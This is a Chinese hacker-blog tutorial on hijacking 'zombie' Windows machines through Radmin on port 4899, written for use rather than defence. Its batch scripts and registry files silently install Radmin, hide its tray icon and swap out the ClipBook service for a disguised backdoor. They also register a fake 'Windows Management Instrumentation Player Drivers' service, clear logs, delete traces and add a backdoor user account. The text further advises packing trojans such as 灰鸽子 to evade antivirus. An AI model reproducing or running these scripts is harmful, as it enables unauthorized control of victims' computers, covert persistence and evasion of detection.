╃苍狼山庄╃╃苍狼山庄╃

Clang出品,
必属精品!

狙击4899肉鸡

对于4899肉鸡,相信大家都不会陌生吧。Radmin远程控制软件最大的优点就是功能齐全,便于操作,能够躲避一些软件的查杀。实在是居家旅行,杀人灭口,绝好武器。那么……有的朋友要问了多么好的宝马良驹在哪里可以找到啊?问的好,各大黑客网站均能下载,童叟无欺啊!(这段对白怎么这么耳熟啊?)

第一章 4899空口令肉鸡争夺战

4899空口令肉鸡是由一些超级菜鸟们用Windows NT/2000 自动攻击探测机对他感兴趣的某段IP细心的,无微不至的扫描孕育而生的~~~(鼓掌,有请我们今天的主角,4899空口令肉鸡隆重登场,哎呀,谁拿西红柿扔我?忒不讲公德呢?扔也不扔个红的,绿的怎么吃啊?)
既然4899空口令肉鸡这个多,那么偶就先从它的由来说起吧!Windows NT/2000 自动攻击探测机 这款扫描软件不但集成了扫描器的特点,还添加了一些漏洞的利用功能。它能够对扫描出IIS溢出的,弱口令的和SA空口令的电脑上传并安装远程图形控制软件Radmin,即把R_Server.exe,AdmDll.dll和raddrv.dll这三个文件上传到其电脑系统跟目录%systemroot%\system32子目录下,并行运行R_Server.exe可执行文件。由于远程上传的Radmin没有经过配置,因此在对方机子的任务栏里出现了Radmin服务程序的托盘(如图1-1)。这样不就成个此地无银三百两,机器的主人一定能发现这个不正常的托盘。我想他第一个动作就是把鼠标移动到托盘位置,一点就显示出了有某某IP正在连接本机。如果是个只知道上网聊天的MM她第一个动作就是把网断了,逃过别人的控制再说。如果是个有经验的老鸟那么各位就要小心了,他会通过显示出的IP查到你的电脑或者你用来扫描的肉鸡,这样就大大的不妙了。所以了,这个托盘的隐藏是非常必要和急切的。
在做我们的工作之前,要做好一些准备活动。首先把4899空口令肉鸡设置上密码,在Radmin的CMD控件下输入命令r_server.exe /port:520 /pass:hackbase /save /silence。有些同僚总是抱怨这个命令不好用,我看过他们出问题的动画。无论是在CMD命令下或者在"运行"下输入这个命令都是正确的,而他们出错的原因就是没有添加参数"/save"保存,和参数"/silence"后台安装。这样设置好连接端口和密码,同道中人就算用"4899空口令扫描器"扫到你做的肉鸡也晚了,偶已经添加过密码了,而端口在肉鸡重起后能够修改成功。接下来我们就要把一个反弹木马放到肉鸡上,以免对方是动态IP,肉鸡就飞掉了。这里我们可以用灰鸽子VIP或黑洞2004这两个反弹木马都很不错的哦~~~。顺便说一句您的木马一定要做过特征码修改或者加壳啊,这样能够躲避对方杀毒软件的查杀。在这里再说句题外话对木马加壳不是加的壳越多就越安全的,这样大家就走入了多加壳的误区。这样不但不能躲过杀毒软件的查杀,还有可能使木马的功能受到影响。对喜欢加壳躲杀毒软件的朋友偶建议下先把木马脱壳,然后再加个不知名的壳(ASPack, UPX这些加壳软件的壳已经被有些杀毒软件列入黑客程序列表了),然后在用几款世面流行的杀毒软件在本地机器事先做个放杀毒检测。
这样的黑客程序才是我们的杀手锏。
前期工作制作完毕后,您就可以耐心的工作了。为了做到隐藏托盘的目的,偶想了两个办法:
第一, 在您的机器上事先安装并配置好Radmin,把注册表中的HKEY_LOCAL_MACHINE\SYSTEM\RAdmin导出为radmin.reg,这个就是绝对符合您意愿的Radmin配置,把radmin.reg上传到对方机器输入命令regedit /s radmin.reg。这样在机器重起或者您帮助他重起Radmin服务的时候,任务栏里的Radmin托盘就消失了。
第二, 写个批处理文件重新调整Radmin配置。批处理文件内容如下:
@echo off
@r_server.exe /port:520 /pass:hackbase /save /silence
echo Windows Registry Editor Version 5.00 >ftp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] >>ftp.reg
echo "DisableTrayIcon"=hex:01,00,00,00 >>ftp.reg
regedit /s ftp.reg
del ftp.reg
到这里菜鸟的"保鸡"反击战已经告一段落。刚才我们不是还放了个灰鸽子吗,这样这台肉鸡上就有我们的两匹宝马良驹了。小样让你跑,还是逃不出如来佛的掌心吧!呵呵,我得意的笑~~~
在长期的摸索研究工作中,偶发现个Windows NT/2000 自动攻击探测机的小BUG。等偶慢慢道来,各位看官听仔细啊。Radmin 3.0影子版的客户端是Radmin公司开发的,而服务端程序缺因为种种原因,没有和各位见面。有的说是Radmin公司在开发新的功能,服务端没有开发完;有的说Radmin公司现在只对付费用户提供服务端,这些偶就不得而知了。可是我们敬爱的影子为我们制造出了"Radmin 3.0服务端"其本质就是2.0版本的部分修改,对其图标做了修改和加壳处理。可是在汉化过程中,不知道什么原因,它在任务栏里的Radmin托盘变成了一个空白的地方,要是不注意是看不出来的(如图1-2、1-3)。所以了,我们在运行Windows NT/2000 自动攻击探测机扫描机子的时候,把它同目录下释放出来的R_Server.exe,替换成3.0版本的R_Server.exe。这样扫描出来上传图形控制软件的机器,在其任务栏里就出现了一个空白的地方。当把鼠标点到上面的时候也没有了某某IP正在连接的提示,这样就欺骗了一些机主。呵呵,旁门左道大家不要见笑啊。可是这个小BUG启发了我的另一个思路,就是把我们的Radmin.exe自动运行的配置包重命名为R_Server.exe,然后替换掉R_Server.exe,我们不就有了所以自己的机子了吗?好,说干就干。把我的Radmin自解压包替换掉R_Server.exe,可是这回Windows NT/2000 自动攻击探测机就没有了上传成功的小提示。(如图:1-4)(广告过后更精彩)我一直对这个验证方法不甚了解,想找作者问问,可是他老人家还换QQ了。哪位高手有高见,请不吝赐教,偶的QQ:9500142。言归正传,那也难不倒我,我们把扫描出来有漏洞的所有IP复制到一个文本文件中,用superscan导入IP列表,扫描我设置Radmin服务的端口,这样被我上传Radmin的机器就都上门报道了。Yeah!(如图:1-5)

第二章 Radmin 服务端高级配置

既然我们对Radmin这么情有独钟,那么我们就要打造不死系的超级后门木马。具推断当前安装过Radmin控制软件的肉鸡占安全性低级的电脑的80%左右,所以我们上传木马之前,要把其系统中可能存在的Radmin服务停止掉,替换成我们的服务为己所用。绝大部分的安装Radmin的肉鸡都是用的R_Server.exe程序。可是种植的原始情况分为两种:
第一 就如上面所说那样,是用Windows NT/2000 自动攻击探测机上传安装的,其安装服务的名称为"radmm"。启动和停止该服务的命令分别为"net start radmm"和"net stop radmm"。
第二 一些喜欢偷懒的朋友,把自己的Radmin是默认的R_Server.exe程序,其安装服务的名称为"Remote Administrator Service"。启动和停止该服务的命令分别为"net start r_server"和"net stop r_server"。
偶发现一个对付这两种配置的小窍门,就是可以用"r_server.exe /start"和"r_server.exe /stop"启动和停止服务,然后我们在替换为自己的配置。
Follow Me!
对配置Radmin自解压程序的,我有两个思路可供大家参详,希望对您能配置能够有所启发和帮助.
第一 就是替换系统服务的方法。如果您对Windows系统服务的工作机理不甚了解,那么请跳过这里,看接下来的第二种配置.
1、编写一个批处理文件,命名为first.bat
--------------------------------------------
@echo off
r_server.exe /stop
--------------------------------------------
这样做是假定肉鸡上已经由黑友安装过Radmin服务,杀无赦。
2、接下来我拿系统的ClipBook服务开刀做下替换。编写一个批处理文件,命名为baby.bat
--------------------------------------------
@echo off
@sc stop ClipBook
@sc delete ClipBook
@sc stop r_server

@del %systemroot%\system32\AdmDll.dll
@del %systemroot%\system32\raddrv.dll
@del %systemroot%\system32\R_Server.exe
@del %systemroot%\system32\dllcache\ClipSrv.exe
@del %systemroot%\system32\ClipSrv.exe
@copy %systemroot%\system32\Setup\ClipSrv.exe
%systemroot%\system32\ClipSrv.exe
@copy %systemroot%\system32\Setup\raddrv.dll
%systemroot%\system32\raddrv.dll
@copy %systemroot%\system32\Setup\AdmDll.dll
%systemroot%\system32\AdmDll.dll

@ClipSrv.exe /install /silence
@regedit /s radmin.reg
@regedit /s server.reg

@sc config ClipBook start=auto
@sc start ClipBook
@sc delete r_server

@del radmin.reg
@del server.reg
@del sc.exe
@clss.exe
@cls
@del baby.exe
@shutdown.exe -f -r
@del first.bat
@del baby.bat
@del clss.exe
@del shutdown.exe
--------------------------------------------
Radmin.reg注册表文件时服务配置,Sc是微软服务修改程序(比尔其实对我们还满不错的哦,嘿嘿),clss.exe是日志清除工具(大家要养成勤扫地的习惯噢!),shutdown.exe是关机程序,这个程序无关紧要,关键看您的性子怎么样了(急性子的黑友建议使用)。Server.reg就是ClipBook服务的描述信息了,要伪装当然要做的够专业啊。
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv]
"Description"="启用"剪贴簿查看器"储存信息并与远程计算机共享。如果此服务终止,"剪贴簿查看器" 将无法与远程计算机共享信息。如果此服务被禁用,任何依赖它的服务将无法启动。"
"DisplayName"="ClipBook"

上面的信息是由原ClipBook服务所对应的注册表键值
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv] 提取出来的。
因为分支包含了部分电脑路径和安全信息,每个电脑都有些许区别,所以把精炼的东西提取出来做为我们的伪装信息。
然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注意那个解压路径 写成%systemroot%\system32\Setup这个目录
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入baby.bat
步骤3 在『解压前运行』输入first.bat
步骤4 选择RAR高级自解压缩选项中的『模式』改两个地方,选择『全部隐藏』和『覆盖所有文件』。命名自解压缩程序命为baby.exe
第二 就是添加一个完全属于偶嘀服务的方法。
1、编写一个批处理文件,命名为first.bat
--------------------------------------------
@echo off
r_server.exe /stop
--------------------------------------------
呵呵,安全第一。
2、接下来偶为我亲爱的小马创建个服务。
服务名称:wmipd
显示名称:Windows Management Instrumentation Player Drivers
编写一个批处理文件,命名为boy.bat
--------------------------------------------
@echo off
@sc stop r_server

@del %systemroot%\system32\AdmDll.dll
@del %systemroot%\system32\raddrv.dll
@del %systemroot%\system32\R_Server.exe
@wmsrv.exe /install /silence
@regedit /s radmin.reg
@net start wmsrv
@attrib +r +h %systemroot%\system32\drivers\wmsrv.exe
@attrib +r +h %systemroot%\system32\drivers\admdll.dll
@attrib +r +h %systemroot%\system32\drivers\raddrv.dll
@regedit /s server.reg

@sc config Windows Management Instrumentation Player Drivers start=auto
@sc start Windows Management Instrumentation Player Drivers
@sc delete r_server

@del radmin.reg
@del server.reg
@del sc.exe
@clss.exe
@cls
@del boy.exe
@del first.bat
@del boy.bat
--------------------------------------------
Radmin.reg注册表文件时服务配置,Sc是微软服务修改程序,clss.exe是日志清除工具。Server.reg就是Windows Management Instrumentation Player Drivers服务的描述信息了,要伪装当然要做的够专业啊。
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wmipd]
"Description"="为Windows Media Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协议服务。"
"DisplayName"="Windows Management Instrumentation Player Drivers"

然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注意那个解压路径 写成%systemroot%\system32\drivers这个目录
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入boy.bat
步骤3 在『解压前运行』输入first.bat
步骤4 选择RAR高级自解压缩选项中的『模式』改两个地方,选择『全部隐藏』和『覆盖所有文件』。命名自解压缩程序命为boy.exe

如果在Radmin服务已经安装的前提下,还可以用Sc.exe把它的服务信息修改了,在这里我就不做演示了,大家动手做做~~~

优点:
1.在系统服务中看见的是Windows Management Instrumentation Player Drivers服务
(可以自定义)
2.服务说明是 为Windows Media Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协议服务
3.在cmd命令提示符下面,使用net start命令看见的是自启动服务是
Windows Management Instrumentation Player Drivers
4.在进程中看见的是wmsrv(可以自定义,在boy.bat文件中相应的位置改一下,注意不要和已有的系统进程起冲突)

第三章 Radmin的访问权限的设置

设置恰当Radmin的访问权限,能够更好的方便在线教学工作的开展,还可以让高手帮
您设置一些东西和远程维护系统,又不会担心别人窥探您的隐私或给下个木马类的好东东。
(呵呵~~~~偶不是贬低高手的道德噢,请高手们别生气~~~)
设置Radmin的访问权限的,首先要设置一个登陆用的帐号net user hackbase neugirl /add
用户所属组为user,这个权限已经够用了。
输入r_server.exe /setup命令调出Radmin服务端设置程序

步骤1 选择『设置参数』,其他参数的配置我在这就不多说了。现在我们关键讲述下『连接确定』的设置
① 如果是做在线教学工作或远程协助,在这里选择『使用用户许可』---『连接超时自动拒绝』超时时间,设置的长点。这里我设置为30秒。(如图:3-1)
② 如果您要是在肉鸡上建立的用户,使用远程操作,那么『连接确定』就不要设置了。免得跳出个要求连接的对话框把管理员吓坏了,这样就不好了。

步骤2 选择『设置密码』---『使用NT用户安全验证』,激活『确定使用』,然后点击『许可』---『添加』。然后会弹出一个『Add user/group』的会话框,点击左下角的『显示用户』,这样电脑中的所有组和用户都显示出来了。选中偶刚才新建的hackbase帐户,添加到右边的会话框中,在右上角的『存取权利』中选中您希望为hackbase该用户开启的访问权限。(如图:3-2)
具体权限分配:
Special access 特殊权限
All access(RTVFC) 所有权限
Full control of screen 完全控制
File transfer 文件传送
View of screen 查看屏幕
Telnet Telnet连接
Redirect 重定向(这个功能偶一直没有找到是控制什么的,请高手赐教)
No access 无权限

然后一路点OK,回到Radmin服务端设置程序后点击『安装程序』,等到安装通知提示"服务安装完成"后,在CMD命令提示符下输入命令net start r_server启动服务。
步骤3 样您在客户端连接服务端电脑的时候就弹出『输入NT用户』的对话框,在这里我填写的是 用户名:hackbase 密码:neugirl 所属域(这个可以不填写)(如图:3-3)

其中Redirect 重定向这个控制什么,偶一直没有弄明白。请请高手赐教。经过妹妹偶做过大量试验证实:Radmin的访问权限的设置适合于Windows 2000和Windows 2003系列各个版本上使用,对于Windows XP 系统Radmin的2.1和3.2版本都不支持。不知为何原因,希望高手能够指点。如果想对远程主机做Radmin的访问权限配置只要在本地主机事先建立一个帐户,然后分配所希望开放的权限,点击『安装程序』,然后在注册表[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Users]分支中就会出现您分配过权限的帐户名,在它的键值中有该用户所属域的"组"及"Radmin控制权限",把这个注册表文件导入到远程主机中,然后在其电脑中建立了同用户名的账号,这样就全部搞定了。
有兴趣的朋友还可以建个隐藏账号作为我们的永久后门!

后记:下面还有一个我写的批处理文件,是用来定时运行Radmin程序的,虽然微软公司的系统维护工具soon和sleep都能够定时运行程序,可使用自己写的批处理文件能够达到目的,也是很欣慰的。嘿嘿
这里说明下批处理文件编写的思路:首先查询本机的当前时间,当然把批处理文件放到肉鸡上就能查肉鸡的时间了。然后把读取的时间暂时存储在内存中,把时间函数拆分为"小时"和"分钟"两部分,付值到tokens调用的两个函数中。在set /a mm=%mm%+2一句中添加上你希望延长多久再运行程序。

@echo off
color 0A
cls

Rem ===============以下是radmin.bat的内容=================
@echo off
echo 正在查询本机的当前时间
echo.
net time \\127.0.0.1 /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
echo %1当前时间为%hh%:%mm%
set /a mm=%mm%+2
if /i %mm% geq 60 set /a mm=0 & set /a hh=%hh%+1
if /i %hh% geq 24 set /a hh=0
set tm=%hh%:%mm%
echo.
echo 设置启动AT命令运行的时间为%tm%
echo.
at \\127.0.0.1 %tm% net stop r_server
Rem ========================完=============================

echo ======================================================
echo Radmin自启动程序
echo ======================================================
echo 最多再过120秒,Radmin服务就会被启动,请稍侯...
echo 请明智地使用,否则可能导致民事或刑事处罚!
echo ------------------------------------------------------

在配置Radmin服务端的时候除了对程序的免查杀处理,还有对其程序图标作下修改,建议使用剑鹰文件合并器或用灰鸽子图标修改器修改成微软系统内部图标。对于Radmin启动隐藏请参见《黑客X档案》第九期《Radmin之自启动》,风写的这个自启动方法很有见地。

本原创文章未经允许不得转载 | 当前页面:╃苍狼山庄╃ » 狙击4899肉鸡

评论

文章评论已关闭!